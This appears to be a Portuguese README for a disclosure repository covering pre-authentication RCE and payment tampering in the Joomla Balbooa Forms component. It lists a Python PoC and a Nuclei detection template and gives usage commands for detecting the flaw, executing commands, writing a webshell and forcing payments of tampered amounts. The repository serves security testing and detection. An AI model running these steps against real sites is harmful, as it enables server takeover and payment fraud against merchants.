
PoCs e modelos de detecção para RCE pré-autenticação e adulteração de pagamentos no Balbooa Forms (Joomla), incluindo exploit em Python e modelo de detecção Nuclei.
PoC e modelos de detecção para duas vulnerabilidades pré-autenticação no Balbooa Forms (com_baforms) para Joomla, corrigidas na versão 2.4.3.2.
Descobertas por Lulztigre, divulgação coordenada via Joomla Security Strike Team (JSST), publicadas em 2026-08-19. Artigo completo: https://lulztigre.pw/posts/balbooa-forms-penny-rce-67363-67364.html
| Arquivo | Finalidade |
|---|
balbooa_forms_poc.py | PoC em Python, apenas stdlib, cobre ambas as CVEs |
CVE-2026-67364.yaml | Modelo Nuclei, detecção não destrutiva do RCE via eval |
Zero dependências (Python 3.8+). Os modos rce e detect não gravam arquivos e não disparam
cobranças reais; shell e pay são opcionais e destinados ao uso em laboratório.
# 1. Encontre um par (form-id, submit-btn) vulnerável. Não destrutivo: cada sonda é uma
# submissão anônima com um payload de marcador de eco.
python3 balbooa_forms_poc.py http://target detect --form-max 3 --btn-max 10
# 2. Prove a execução de comandos. A saída retorna na resposta HTTP, sem persistência.
python3 balbooa_forms_poc.py http://target rce --form 1 --btn 7 --cmd id
# 3. Prova clássica de webshell (apenas laboratório - grava images/shell.php)
python3 balbooa_forms_poc.py http://target shell --form 1 --btn 7
# 4. Adulteração do valor de pagamento (apenas laboratório - dispara tentativas de cobrança REAIS; requer --authorize)
python3 balbooa_forms_poc.py http://target pay --authorize --total 0.01
Código de saída 0 = vulnerável/explorado, 1 = limpo ou falhou, 2 = erro de uso.
Observações:
[Parâmetro de URL = X], e sem reCAPTCHA no botão.--insecure ignora a verificação TLS para alvos HTTPS com certificados autoassinados.Apenas detecção: extrai o token CSRF anônimo, depois varre pequenos intervalos de form/btn com um payload de marcador de eco e corresponde o marcador na resposta. Nenhum arquivo é gravado, nenhuma cobrança real é disparada.
nuclei -t CVE-2026-67364.yaml -u http://target -v
Verificado contra nuclei v3.11.1 (Windows + Linux): extração de token, varredura de 30 pares
(form-id 1..3 x submit-btn 1..10, clusterbomb), 1 correspondência crítica no par vulnerável.
Adicione -duc em máquinas offline para pular a verificação de atualização. A varredura é deliberadamente
pequena; aumente os intervalos de payload se um alvo hospedar mais formulários. A adulteração de pagamento
(CVE-2026-67363) NÃO é automatizada intencionalmente no nuclei: cada sonda é uma tentativa de cobrança real
contra o gateway do comerciante.
Use apenas contra sistemas que você está autorizado a testar.